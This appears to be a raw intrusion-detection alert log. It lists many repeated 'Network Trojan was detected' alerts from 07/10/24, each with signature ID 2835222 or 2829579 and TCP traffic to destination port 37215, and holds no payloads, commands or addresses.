                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.896648
                  SID:2835222
                  Source Port:57094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.033039
                  SID:2829579
                  Source Port:55160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.041002
                  SID:2835222
                  Source Port:49578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.956024
                  SID:2829579
                  Source Port:50562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.761571
                  SID:2829579
                  Source Port:51308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.082324
                  SID:2835222
                  Source Port:45850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081333
                  SID:2835222
                  Source Port:34680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.863530
                  SID:2835222
                  Source Port:49104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.866153
                  SID:2835222
                  Source Port:44356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.073471
                  SID:2829579
                  Source Port:51838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.190892
                  SID:2835222
                  Source Port:55962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.597902
                  SID:2829579
                  Source Port:51024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.915007
                  SID:2829579
                  Source Port:35876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.108447
                  SID:2835222
                  Source Port:47410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.592748
                  SID:2829579
                  Source Port:41356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.925120
                  SID:2835222
                  Source Port:53842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.431901
                  SID:2829579
                  Source Port:33430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.078747
                  SID:2829579
                  Source Port:53550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.873718
                  SID:2829579
                  Source Port:42870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384495
                  SID:2829579
                  Source Port:43554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.857125
                  SID:2829579
                  Source Port:40196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.669176
                  SID:2829579
                  Source Port:51086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.422156
                  SID:2835222
                  Source Port:38506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.831762
                  SID:2835222
                  Source Port:52276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.418573
                  SID:2829579
                  Source Port:50420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.239106
                  SID:2829579
                  Source Port:59828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.769630
                  SID:2829579
                  Source Port:44846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.636807
                  SID:2835222
                  Source Port:41392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.584651
                  SID:2829579
                  Source Port:37432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.849437
                  SID:2835222
                  Source Port:40068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.919508
                  SID:2829579
                  Source Port:35202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.809850
                  SID:2835222
                  Source Port:38162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.798574
                  SID:2829579
                  Source Port:57336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.381713
                  SID:2829579
                  Source Port:56898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.558138
                  SID:2829579
                  Source Port:44944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.269822
                  SID:2829579
                  Source Port:60424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.148886
                  SID:2835222
                  Source Port:54546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.907238
                  SID:2835222
                  Source Port:54702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.034808
                  SID:2829579
                  Source Port:51054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.287568
                  SID:2835222
                  Source Port:36720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.576208
                  SID:2829579
                  Source Port:60384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.761946
                  SID:2835222
                  Source Port:53924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.842346
                  SID:2829579
                  Source Port:60052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.587895
                  SID:2829579
                  Source Port:38372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.393645
                  SID:2835222
                  Source Port:44670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.592931
                  SID:2835222
                  Source Port:50466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.419620
                  SID:2835222
                  Source Port:41322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.443386
                  SID:2835222
                  Source Port:36336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.934356
                  SID:2829579
                  Source Port:45470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.002170
                  SID:2835222
                  Source Port:54228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.045782
                  SID:2835222
                  Source Port:52562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.773863
                  SID:2835222
                  Source Port:49638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.787067
                  SID:2829579
                  Source Port:51070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.518059
                  SID:2835222
                  Source Port:57200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.151266
                  SID:2835222
                  Source Port:36692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.655668
                  SID:2835222
                  Source Port:35438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.567555
                  SID:2835222
                  Source Port:32818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.151006
                  SID:2835222
                  Source Port:35864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.855166
                  SID:2835222
                  Source Port:54738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.548178
                  SID:2829579
                  Source Port:48064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415369
                  SID:2835222
                  Source Port:47766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.517659
                  SID:2829579
                  Source Port:41570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.952619
                  SID:2829579
                  Source Port:46864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819736
                  SID:2829579
                  Source Port:60782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.213994
                  SID:2829579
                  Source Port:33168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.985222
                  SID:2829579
                  Source Port:45566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.794686
                  SID:2829579
                  Source Port:55190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.544171
                  SID:2829579
                  Source Port:41326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.456446
                  SID:2829579
                  Source Port:58194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.684661
                  SID:2829579
                  Source Port:44454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.161744
                  SID:2835222
                  Source Port:39968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.209282
                  SID:2829579
                  Source Port:57462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.526657
                  SID:2835222
                  Source Port:52074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.962148
                  SID:2835222
                  Source Port:47020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.405886
                  SID:2829579
                  Source Port:41848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.243184
                  SID:2835222
                  Source Port:41502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.443914
                  SID:2835222
                  Source Port:47698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623181
                  SID:2829579
                  Source Port:57868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.873378
                  SID:2835222
                  Source Port:44870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.659473
                  SID:2829579
                  Source Port:58002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.774458
                  SID:2835222
                  Source Port:36786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.802521
                  SID:2829579
                  Source Port:39380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.925119
                  SID:2829579
                  Source Port:45308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.844473
                  SID:2829579
                  Source Port:54438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.658229
                  SID:2835222
                  Source Port:35100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.758809
                  SID:2829579
                  Source Port:51092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.543257
                  SID:2829579
                  Source Port:47318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.539034
                  SID:2835222
                  Source Port:49126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.570262
                  SID:2829579
                  Source Port:43382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.486386
                  SID:2829579
                  Source Port:48152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.610357
                  SID:2829579
                  Source Port:54372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.986988
                  SID:2829579
                  Source Port:56350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.239917
                  SID:2835222
                  Source Port:43694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.413310
                  SID:2835222
                  Source Port:57568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.848690
                  SID:2829579
                  Source Port:48510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.463838
                  SID:2835222
                  Source Port:47290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.551347
                  SID:2835222
                  Source Port:42438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.781687
                  SID:2829579
                  Source Port:32912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.645835
                  SID:2835222
                  Source Port:47216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.426350
                  SID:2829579
                  Source Port:57940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.625884
                  SID:2829579
                  Source Port:48418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.612817
                  SID:2835222
                  Source Port:33996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.655669
                  SID:2835222
                  Source Port:52622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.943486
                  SID:2829579
                  Source Port:41742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.970064
                  SID:2829579
                  Source Port:60562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.619989
                  SID:2829579
                  Source Port:33384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366759
                  SID:2829579
                  Source Port:46042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.065824
                  SID:2829579
                  Source Port:52212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.830759
                  SID:2829579
                  Source Port:57832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.945424
                  SID:2835222
                  Source Port:60612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.948537
                  SID:2829579
                  Source Port:46326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.592748
                  SID:2835222
                  Source Port:59238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.593481
                  SID:2835222
                  Source Port:38014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.397659
                  SID:2835222
                  Source Port:42260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.594738
                  SID:2829579
                  Source Port:51578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.667956
                  SID:2835222
                  Source Port:41532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.175364
                  SID:2835222
                  Source Port:55770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.849080
                  SID:2829579
                  Source Port:41764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.441172
                  SID:2829579
                  Source Port:57450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.358429
                  SID:2835222
                  Source Port:50204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.428275
                  SID:2829579
                  Source Port:34920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.501103
                  SID:2829579
                  Source Port:35032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.904429
                  SID:2835222
                  Source Port:36666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.799861
                  SID:2835222
                  Source Port:59630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.649777
                  SID:2829579
                  Source Port:49174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.673199
                  SID:2835222
                  Source Port:45056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.632292
                  SID:2835222
                  Source Port:42698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.675838
                  SID:2829579
                  Source Port:48980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.342964
                  SID:2835222
                  Source Port:45300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.472271
                  SID:2835222
                  Source Port:51582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.063250
                  SID:2829579
                  Source Port:49764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.453376
                  SID:2835222
                  Source Port:50144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.932335
                  SID:2829579
                  Source Port:43322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.505029
                  SID:2829579
                  Source Port:47210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.231574
                  SID:2835222
                  Source Port:41714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.572327
                  SID:2835222
                  Source Port:33552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.392563
                  SID:2835222
                  Source Port:60306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814365
                  SID:2829579
                  Source Port:54866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.526473
                  SID:2835222
                  Source Port:50472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.172192
                  SID:2835222
                  Source Port:49444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.775624
                  SID:2829579
                  Source Port:60966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.172679
                  SID:2835222
                  Source Port:49228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.900850
                  SID:2835222
                  Source Port:59084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.452123
                  SID:2829579
                  Source Port:38054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.468689
                  SID:2829579
                  Source Port:58380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.860875
                  SID:2829579
                  Source Port:46294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.340443
                  SID:2829579
                  Source Port:51104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.276470
                  SID:2829579
                  Source Port:43816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.841879
                  SID:2829579
                  Source Port:38196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.220907
                  SID:2835222
                  Source Port:53068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.778762
                  SID:2829579
                  Source Port:56638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.190530
                  SID:2829579
                  Source Port:55648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.714524
                  SID:2835222
                  Source Port:36946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.169986
                  SID:2835222
                  Source Port:46036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.092800
                  SID:2829579
                  Source Port:34398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.409731
                  SID:2829579
                  Source Port:33768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.984415
                  SID:2835222
                  Source Port:53868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.547774
                  SID:2835222
                  Source Port:56024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.768994
                  SID:2835222
                  Source Port:45720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.520093
                  SID:2829579
                  Source Port:59296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.775539
                  SID:2829579
                  Source Port:40460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.740584
                  SID:2829579
                  Source Port:45560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.533118
                  SID:2829579
                  Source Port:47074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.466887
                  SID:2829579
                  Source Port:55140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.025599
                  SID:2829579
                  Source Port:55756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.437345
                  SID:2835222
                  Source Port:39268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.867755
                  SID:2829579
                  Source Port:45018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.061438
                  SID:2835222
                  Source Port:35666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.350610
                  SID:2829579
                  Source Port:39938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.955612
                  SID:2829579
                  Source Port:38888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.000855
                  SID:2835222
                  Source Port:51572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.878824
                  SID:2835222
                  Source Port:57396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.489680
                  SID:2829579
                  Source Port:58250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.844499
                  SID:2835222
                  Source Port:53000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.547340
                  SID:2829579
                  Source Port:54888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.563571
                  SID:2829579
                  Source Port:37212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.152800
                  SID:2829579
                  Source Port:33720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.900161
                  SID:2829579
                  Source Port:34024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.564430
                  SID:2829579
                  Source Port:51554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.183370
                  SID:2829579
                  Source Port:56018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.866753
                  SID:2829579
                  Source Port:56846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.862104
                  SID:2829579
                  Source Port:56912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.011298
                  SID:2829579
                  Source Port:41032
                  Destination Port:37215
